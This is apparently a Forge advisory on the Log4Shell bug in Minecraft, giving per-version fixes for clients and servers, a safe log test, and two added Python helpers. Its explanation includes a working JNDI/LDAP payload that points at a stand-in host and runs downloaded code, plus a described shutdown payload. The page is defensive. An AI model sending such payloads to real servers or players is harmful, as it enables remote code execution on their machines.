Log4J has a lookup feature built on the Java Naming and Directory Interface (shortened to JNDI in this document), which allows a Java program to reach out to an external source to gather data.
If a piece of text containing ${jndi:query} ends up in the log, the Log4J library will try to resolve the query.
This can be combined with the Lightweight Directory Access Protocol (LDAP) to connect to a remote server.
However, because JNDI is built for retrieving data, and what it retrieves can be Java code, putting a JNDI query that uses LDAP into a log makes the library connect to the given server, download a file, and then execute it.
This is called Remote Code Execution.
The problem is that Minecraft logs everything that happens in the world.
Every message, every death, every achievement.
Any of these can contain a JNDI query.
This might not seem so bad yet, but consider the following:
- You create a small Java program that executes shutdown now in a shell.
- You host the Java class file on a small webserver.
- You join any Minecraft server.
- You send the message ${jndi:ldap://your.ip.com/exploit/} into the chat of the server.
- The server (and every client connected) logs the chat message.
- The logger downloads the class file.
- The class file is executed.
- The server's and every client's computer shut down, with no warning.
This exploit is called Log4Shell.
This is a brutal bug. It can be used for much more than just shutting down.
It can run crypto miners, it can install ransomware, it can just straight up format your main hard drive...
See technical details on the exploit here, and Mojang's advice here (note that this doesn't apply to Forge; read on).
See also, what you can do with the exploit if you want to have actual fun here.
Don't panic. This document exists to tell you how to protect yourself against it, as a user of Forge.
There's one thing we need to go over, first.
There's a clear and present split around version 1.12, regarding the Log4J library.
Versions before 1.12 use an older version of Log4J, and versions after use a newer version.
The newer version added a bunch of optional workarounds that we can use, but the older version has no such options.
I'm going to separate our advice into these two version ranges, but there's another special case and one last topic we'll have to talk about first.
Even if a server is protected from the bug, it will still relay the attack message to all connected clients without hesitation.
It is therefore of the utmost importance that you ALWAYS, NO MATTER WHAT, protect your client.
You can find more detailed information on how to do that below.
To test whether or not these changes actually work for you, there's a simple trick.
To test the client:
- Open a client, join any world and send the message ${date:YYYY} in chat.
- Close the game and inspect the latest.log file (it's in .minecraft/logs/).
- Scroll down to the last few messages sent. If you see the text 2021 being sent as a message by yourself, then your client is vulnerable and you should apply the fix listed for your version below.
To test the server:
- Join the server with your client.
- Send the message ${date:YYYY} in chat.
- Inspect the server's latest.log file.
- If you see the text 2021 being sent as a message by yourself, then the server is vulnerable.
The expected behaviour is to either see the text ${date:YYYY} in the log itself, or to not see it at all.
Some versions remove the message from the log, some versions just prevent it from resolving.
In either case, you must NOT see 2021 in the log file.
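A small checker for the test above, added here and not part of the original page: it scans a latest.log for your own chat lines and applies the three outcomes just described (the resolved year, the literal ${date:YYYY}, or no trace at all). The log lines below are constructed in the usual latest.log shape, and ${date:YYYY} is assumed to resolve to the current year (2021 when this page was written).

```python
import re
from datetime import date

# Constructed lines in the shape of a Minecraft latest.log, not real captures. Server
# chat lines read "<player> message"; client lines carry an extra "[CHAT]" tag.
SAMPLE_LOG = """\
[18:02:11] [Server thread/INFO]: Steve joined the game
[18:02:15] [Server thread/INFO]: <Steve> hello everyone
[18:02:20] [Server thread/INFO]: <Steve> 2021
[18:02:31] [Render thread/INFO]: [CHAT] <Alex> ${date:YYYY}
"""

# "[time] [thread/LEVEL]: [CHAT] <player> message", with the [CHAT] tag optional.
CHAT_RE = re.compile(r"^\[[^\]]+\] \[[^\]]+\]: (?:\[CHAT\] )?<(?P<who>[^>]+)> (?P<msg>.*)$")
# Any lookup string that was logged verbatim instead of being resolved, e.g. ${date:YYYY}.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")

def chat_messages(log_text, player=None):
    """Yield chat messages in log order, optionally only those sent by `player`."""
    for line in log_text.splitlines():
        m = CHAT_RE.match(line)
        if m and (player is None or m.group("who") == player):
            yield m.group("msg")

def classify(log_text, player, probe="${date:YYYY}", resolved=None):
    """Apply the page's test after `player` has sent `probe` in chat.

    "vulnerable": a message from `player` is the resolved value (the lookup ran).
    "protected-unresolved": the probe was logged verbatim (lookups disabled).
    "protected-stripped": no trace of the probe at all (the message was dropped).
    """
    if resolved is None:
        resolved = str(date.today().year)  # ${date:YYYY} resolves to the current year
    msgs = list(chat_messages(log_text, player))
    if any(msg.strip() == resolved for msg in msgs):
        return "vulnerable"
    if any(probe in msg for msg in msgs):
        return "protected-unresolved"
    return "protected-stripped"

def unresolved_lookups(log_text):
    """Every lookup string left verbatim in chat lines; non-empty on a patched install."""
    return [hit for msg in chat_messages(log_text) for hit in LOOKUP_RE.findall(msg)]

if __name__ == "__main__":
    import sys
    # Usage: python check_log4shell.py .minecraft/logs/latest.log <your player name>
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        print(classify(fh.read(), sys.argv[2]))
```

A player name that never appears in the log also yields "protected-stripped", so confirm your own chat lines are present (for example with chat_messages) before trusting that verdict.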
A second, related bug in Log4J was found after the initial patch.
Luckily, we are not affected by it, as it exploits a feature that Minecraft does not use.
The second Log4J bug is not something to worry about; it is covered by the steps below.
The 1.11 client install has a quirk.
Forge overrides the vanilla logging configuration with its own.
However, as explained below, the vanilla configuration is the one we want to use on the client.
So, to fix this:
- Close the launcher, if it is open.
- Find your .minecraft folder (on Windows it's %AppData%/.minecraft, on Linux it's ~/.minecraft/).
- Go to the versions folder.
- Find the Forge installation you're using. The latest 1.11.2 Forge folder is called "1.11.2-forge1.11.2-13.20.1.2588".
- Open the folder.
- Open the .json file within, with any text editor.
- Find the section that looks like:
  "logging": {
  },
- Delete the whole logging block, including the last } and the comma.
Now you can restart the game and the fix will be applied.
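A scripted version of the steps above, added here and not part of the Forge page: it parses the version .json and drops the whole top-level "logging" block, so the closing brace and comma are removed correctly without hand-editing, and keeps a .bak copy. The sample JSON is a constructed stand-in (the real file carries many more keys), and the path in the usage line is an assumption.

```python
import json
from pathlib import Path

# Constructed stand-in for a Forge 1.11.2 version .json; the real file has many more keys.
SAMPLE_VERSION_JSON = """{
  "id": "1.11.2-forge1.11.2-13.20.1.2588",
  "inheritsFrom": "1.11.2",
  "mainClass": "net.minecraft.launchwrapper.Launch",
  "logging": {
    "client": {
      "argument": "-Dlog4j.configurationFile=${path}",
      "type": "log4j2-xml"
    }
  }
}
"""

def has_logging_block(text):
    """True if the version JSON still carries a top-level "logging" block."""
    return "logging" in json.loads(text)

def strip_logging_block(text):
    """Return (new_text, changed) with the whole top-level "logging" block removed.

    Working on the parsed object rather than deleting lines by hand takes care of
    the trailing brace and comma the manual steps warn about and leaves everything
    else in the file untouched.
    """
    data = json.loads(text)
    if data.pop("logging", None) is None:
        return text, False
    return json.dumps(data, indent=2) + "\n", True

def fix_version_json(path):
    """Apply the fix in place, keeping a .bak copy of the original. Returns True if changed."""
    path = Path(path)
    original = path.read_text(encoding="utf-8")
    new_text, changed = strip_logging_block(original)
    if changed:
        path.with_suffix(".json.bak").write_text(original, encoding="utf-8")
        path.write_text(new_text, encoding="utf-8")
    return changed

if __name__ == "__main__":
    import sys
    # Usage (assumed layout): python fix_forge_1_11_logging.py ~/.minecraft/versions/<forge folder>/<forge folder>.json
    print("logging block removed" if fix_version_json(sys.argv[1]) else "no logging block found")
```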
Clients on versions between (and including) 1.7 and 1.11 are automatically protected by a fix that Mojang made.
You MUST restart the launcher for this fix to be applied, but after that point you should be fine.
For 1.12 and above, the newer library allowed us to make some more thorough changes.
Primarily, we've updated the logging library itself to a version that does not have the ability to connect to external servers at all.
To get this fix, simply go to the files site and download and run the installer for any of these versions:
- 1.18-38.0.17 or higher
- 1.17.1-37.1.1 or higher
- 1.16.5-36.2.20 or higher
- 1.15.2-31.2.56 or higher
- 1.14.4-28.2.25 or higher
- 1.13.2-25.0.222 or higher
- 1.12.2-14.23.5.2857 or higher
MAKE SURE that the launcher is using this new version and not the older, vulnerable version.
Apart from that, your client is now ready.
All server operators need to apply an adjusted logging configuration.
It's extremely simple:
- Download the logging xml file from here
- Put the file in the server folder (next to the .jar files)
- Restart the server
That's it. You don't need to do anything else. You're done.
Note that the command line argument -Dlog4j.configurationFile=log4j2_server.xml exists, and can be used on vanilla servers.
Forge does not require this to be used.
Servers on the 1.12-and-newer versions listed above can benefit from the same fix as the client.
Simply download the LATEST installer from the files site and install it in place on top of your existing server.
Your existing run scripts should work with minor modifications.
Minecraft Version | Recommended Fix |
---|---|
1.7 | Apply an adjusted logging configuration: 1) download the logging xml file from here; 2) put the file in the server folder (next to the .jar files); 3) add the command line argument -Dlog4j.configurationFile=log4j2_server.xml to the server startup script; 4) restart the server. That's it, you don't need to do anything else. |
1.8 to 1.11.2 | Apply an adjusted logging configuration: 1) download the logging xml file from here; 2) put the file in the server folder (next to the .jar files); 3) restart the server. That's it, you're done. The command line argument -Dlog4j.configurationFile=log4j2_server.xml exists and can be used on vanilla servers, but Forge does not require it for these versions. |
1.12 to 1.12.2 | A similar fix as for servers below 1.12 exists for this version. Download this file and put it in the server folder, then add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or the command you use to start the server). Make sure it's before the -jar part; it must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work. Apart from that, your server is now ready to restart. |
1.13 to 1.16.3 | Same fix as for 1.12 to 1.12.2: download this file into the server folder and add -Dlog4j.configurationFile=log4j2_server.xml to the run.bat / run.sh file (or your start command), before the -jar part. Apart from that, your server is now ready to restart. |
1.16.4 to the current version | Same file and argument as for 1.12 to 1.12.2. For 1.17 and 1.18, put the text -Dlog4j.configurationFile=log4j2_server.xml in the user_jvm_args.txt file. For older versions, add it to the run.bat / run.sh file (or the command you use to start the server), before the -jar part; it must read something like java -Dlog4j.configurationFile=log4j2_server.xml -jar forge-version.jar in order to work. Apart from that, your server is now ready to restart. |